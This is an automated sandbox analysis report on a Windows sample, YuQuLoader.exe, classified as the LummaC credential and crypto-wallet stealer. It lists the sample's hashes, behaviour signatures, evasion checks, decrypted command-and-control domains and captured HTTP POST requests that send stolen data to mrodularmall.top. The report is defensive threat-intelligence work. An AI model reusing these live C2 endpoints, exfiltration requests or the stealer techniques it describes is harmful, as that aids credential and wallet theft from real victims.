
Windows Analysis Report
YuQuLoader.exe

Overview

General Information

Sample name: YuQuLoader.exe
Analysis ID: 1635448
MD5: 849c830e2af83f171e9607e3d2e7f694
SHA1: 760e86b28b8a76fd47a9a31b711b58480088b6aa
SHA256: 350d0f5dba0941904595a2f132cc43af3d23a1a7aa6ee272b9dd0408d2b58022
Tags: exe, LummaStealer, user-aachum

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign process
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc.)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number, etc.) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • YuQuLoader.exe (PID: 8608 cmdline: "C:\Users\user\Desktop\YuQuLoader.exe" MD5: 849C830E2AF83F171E9607E3D2E7F694)
    • conhost.exe (PID: 8616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • YuQuLoader.exe (PID: 8668 cmdline: "C:\Users\user\Desktop\YuQuLoader.exe" MD5: 849C830E2AF83F171E9607E3D2E7F694)
    • WerFault.exe (PID: 8756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8608 -s 404 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000003.1557228002.0000000001640000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000003.1557692943.00000000015F8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000003.1557429661.00000000015DB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000003.1557429661.0000000001640000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000002.2617683051.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
Source | Rule | Description | Author | Strings
2.2.YuQuLoader.exe.400000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
2.2.YuQuLoader.exe.400000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-11T17:23:27.701362+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49711 | 149.154.167.99 | 443 | TCP
2025-03-11T17:23:29.701106+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49713 | 104.21.93.43 | 443 | TCP
2025-03-11T17:23:32.032770+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49714 | 104.21.112.1 | 443 | TCP
2025-03-11T17:23:35.627519+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49716 | 104.21.112.1 | 443 | TCP
2025-03-11T17:23:38.809453+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49717 | 104.21.112.1 | 443 | TCP
2025-03-11T17:23:41.948508+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49718 | 104.21.112.1 | 443 | TCP
2025-03-11T17:23:46.175894+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49721 | 104.21.112.1 | 443 | TCP
2025-03-11T17:23:49.894407+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49723 | 104.21.112.1 | 443 | TCP
2025-03-11T17:23:55.565780+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49725 | 104.21.112.1 | 443 | TCP


AV Detection

Source: https://mrodularmall.top/aJ | Avira URL Cloud: Label: malware
Source: https://mrodularmall.top:443/aNzSMicrosoft | Avira URL Cloud: Label: malware
Source: https://mrodularmall.top/aNzS | Avira URL Cloud: Label: malware
Source: https://mrodularmall.top/b | Avira URL Cloud: Label: malware
Source: https://mrodularmall.top/ | Avira URL Cloud: Label: malware
Source: https://mrodularmall.top/aNzS33 | Avira URL Cloud: Label: malware
Source: https://mrodularmall.top/aNzSrmal | Avira URL Cloud: Label: malware
Source: https://mrodularmall.top/aR | Avira URL Cloud: Label: malware
Source: YuQuLoader.exe | Virustotal: Detection: 41%
Source: YuQuLoader.exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp | String decryptor: astralconnec.icu/DPowko
Source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp | String decryptor: featureccus.shop/bdMAn
Source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp | String decryptor: mrodularmall.top/aNzS
Source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp | String decryptor: jowinjoinery.icu/bdWUa
Source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp | String decryptor: legenassedk.top/bdpWO
Source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp | String decryptor: htardwarehu.icu/Sbdsa
Source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp | String decryptor: cjlaspcorne.icu/DbIps
Source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp | String decryptor: bugildbett.top/bAuz
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 2_2_0041CCB6 CryptUnprotectData, 2_2_0041CCB6
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 2_2_0041D7D2 CryptUnprotectData, CryptUnprotectData, 2_2_0041D7D2
Source: YuQuLoader.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: YuQuLoader.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 0_2_00B0F86F FindFirstFileExW, FindNextFileW, FindClose, FindClose, 0_2_00B0F86F
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 0_2_00B0F7BE FindFirstFileExW, 0_2_00B0F7BE
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 2_2_00B0F86F FindFirstFileExW, FindNextFileW, FindClose, FindClose, 2_2_00B0F86F
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 2_2_00B0F7BE FindFirstFileExW, 2_2_00B0F7BE
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+edx+50h] 2_2_0040F14B
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then cmp dword ptr [esi+eax*8], CA198B66h 2_2_004479B0
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then push edi 2_2_0041330A
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2Ch] 2_2_0044D320
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+esi+02h] 2_2_00429C40
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then cmp word ptr [edi+ebx], 0000h 2_2_0044BC40
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx eax, byte ptr [esp+ecx+10h] 2_2_0040DC5A
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h 2_2_00443D60
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1A7D4DF8h] 2_2_00421E50
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], A566C0CEh 2_2_00421E50
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7FFFFFFFh] 2_2_0042FE10
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-773910CCh] 2_2_0042FE10
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h 2_2_0041D7D2
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then mov word ptr [ecx], dx 2_2_0044CFE0
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h] 2_2_00443F90
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+18h] 2_2_00443F90
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-3C8EC9B8h] 2_2_00411F95
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h 2_2_00429050
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-6D3F2B30h] 2_2_0044B060
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+000011E8h] 2_2_0042D070
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then mov word ptr [eax], cx 2_2_004328D7
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000000E0h] 2_2_004110E0
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 2_2_0041B880
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then mov word ptr [eax], cx 2_2_0041B940
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-6D3F2B30h] 2_2_0044B150
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h 2_2_0044C1C0
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then mov edx, eax 2_2_004491D4
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh 2_2_004019E0
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then mov esi, edx 2_2_004261A0
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-3B9108C6h] 2_2_0042D201
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] 2_2_0040A210
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] 2_2_0040A210
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then mov word ptr [eax], dx 2_2_00427A20
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1Ch] 2_2_0040C2D0
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then mov byte ptr [edi], al 2_2_0040C2D0
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] 2_2_00433AD0
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000BCh] 2_2_0040FAE0
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1A7D4DECh] 2_2_004482F0
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1A7D4DECh] 2_2_004482F0
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 9F1F8F53h 2_2_004482F0
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] 2_2_004412A0
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then mov byte ptr [esi], cl 2_2_00423BF0
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax+0587871Ah] 2_2_0040F380
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-001A1106h] 2_2_00430390
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1A7D4DECh] 2_2_00445420
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2Ch] 2_2_0044D4A0
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx+44h] 2_2_00423D41
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then mov byte ptr [esi], cl 2_2_00423D41
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-46h] 2_2_00421530
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx esi, byte ptr [edi+eax+01h] 2_2_004105E7
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 1ED597A4h 2_2_00447D90
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then mov dword ptr [ebp-10h], esi 2_2_00431E70
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+20h] 2_2_0041E618
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+01h] 2_2_0040BEC0
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx eax, byte ptr [edx] 2_2_0042EEC0
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx+69266341h] 2_2_004336F6
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then mov word ptr [ecx], si 2_2_0041F6A9
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+1A7D4DECh] 2_2_00444F50
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+1A7D4DECh] 2_2_00447FC0
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68h] 2_2_004207F8
Source: global traffic | HTTP traffic detected:
    GET /asdawfq HTTP/1.1
    Connection: Keep-Alive
    Host: t.me
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 104.21.93.43:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49718 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49723 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49721 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49725 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 149.154.167.99:443
Source: global traffic | HTTP traffic detected:
    POST /aNzS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 65
    Host: mrodularmall.top
Source: global traffic | HTTP traffic detected:
    POST /aNzS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=53Oe3gS1M
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 14892
    Host: mrodularmall.top
Source: global traffic | HTTP traffic detected:
    POST /aNzS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=FZUWWktq31htF
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15061
    Host: mrodularmall.top
Source: global traffic | HTTP traffic detected:
    POST /aNzS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=ZljRRr7joE7Lj
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20550
    Host: mrodularmall.top
Source: global traffic | HTTP traffic detected:
    POST /aNzS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=o38L1GPF
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 2460
    Host: mrodularmall.top
Source: global traffic | HTTP traffic detected:
    POST /aNzS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=yGB1I56Y0N
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 587685
    Host: mrodularmall.top
Source: global traffic | HTTP traffic detected:
    POST /aNzS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 103
    Host: mrodularmall.top
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET /asdawfq HTTP/1.1
    Connection: Keep-Alive
    Host: t.me
Source: global traffic | DNS traffic detected: DNS query: t.me
Source: global traffic | DNS traffic detected: DNS query: astralconnec.icu
Source: global traffic | DNS traffic detected: DNS query: featureccus.shop
Source: global traffic | DNS traffic detected: DNS query: mrodularmall.top
Source: unknown | HTTP traffic detected:
    POST /aNzS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 65
    Host: mrodularmall.top
Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.5.dr | String found in binary or memory: http://upx.sf.net
Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
Source: YuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: YuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: YuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: YuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
Source: YuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: YuQuLoader.exe, 00000002.00000003.1615811918.0000000001668000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000002.2618503724.0000000001664000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681284940.0000000001655000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681714373.0000000001663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mrodularmall.top/
Source: YuQuLoader.exe, 00000002.00000003.1615811918.0000000001668000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mrodularmall.top/aJ
Source: YuQuLoader.exe, 00000002.00000003.1681524125.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.2281775976.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.2282475400.00000000015E5000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1615811918.0000000001668000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000002.2618503724.0000000001664000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1514113776.0000000001671000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1651675961.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1513801004.0000000001670000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000002.2618247234.00000000015E6000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681284940.0000000001655000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1557228002.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1652000979.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1481608033.0000000001670000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681714373.0000000001663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mrodularmall.top/aNzS
Source: YuQuLoader.exe, 00000002.00000002.2618436068.0000000001646000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681464391.0000000001646000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mrodularmall.top/aNzS33
